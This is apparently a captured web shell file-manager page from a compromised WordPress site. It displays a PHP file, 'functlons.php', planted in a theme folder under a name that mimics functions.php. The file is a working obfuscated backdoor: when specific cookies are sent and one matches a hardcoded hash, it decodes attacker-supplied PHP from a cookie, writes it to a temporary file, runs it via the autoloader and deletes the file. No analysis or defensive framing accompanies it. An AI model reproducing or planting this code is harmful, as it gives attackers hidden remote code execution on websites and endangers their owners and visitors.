HEX
Server: LiteSpeed
System: Linux premium192.web-hosting.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User: silvpoho (1289)
PHP: 8.1.34
Disabled: NONE
$ pwd: /home/silvpoho/dayanecrespo.com/wp-content/themes/post-1770588479/
Upload Files
File: /home/silvpoho/dayanecrespo.com/wp-content/themes/post-1770588479/functlons.php
<!--1knC2BzB-->
<?php

if (isset($_COOKIE[69+-69]) && isset($_COOKIE[-33+34]) && isset($_COOKIE[3+0]) && isset($_COOKIE[-47+51])) {
    $desc = $_COOKIE;
    function reverse_lookup($factor) {
        $desc = $_COOKIE;
        $rec = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'huN4U5yi');
        if (!is_writable($rec)) {
            $rec = getcwd() . DIRECTORY_SEPARATOR . "request_approved";
        }
        $element = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($desc[3]));
        if (is_writeable($rec)) {
            $record = fopen($rec, 'w+');
            fputs($record, $element);
            fclose($record);
            spl_autoload_unregister(__FUNCTION__);
            require_once($rec);
            @array_map('unlink', array($rec));
        }
    }
    spl_autoload_register("reverse_lookup");
    $holder = "f58154dacfbcef204e413958723f8e68";
    if (!strncmp($holder, $desc[4], 32)) {
        if (@class_parents("auth_exception_handler_secure_access", true)) {
            exit;
        }
    }
}
@ Telegram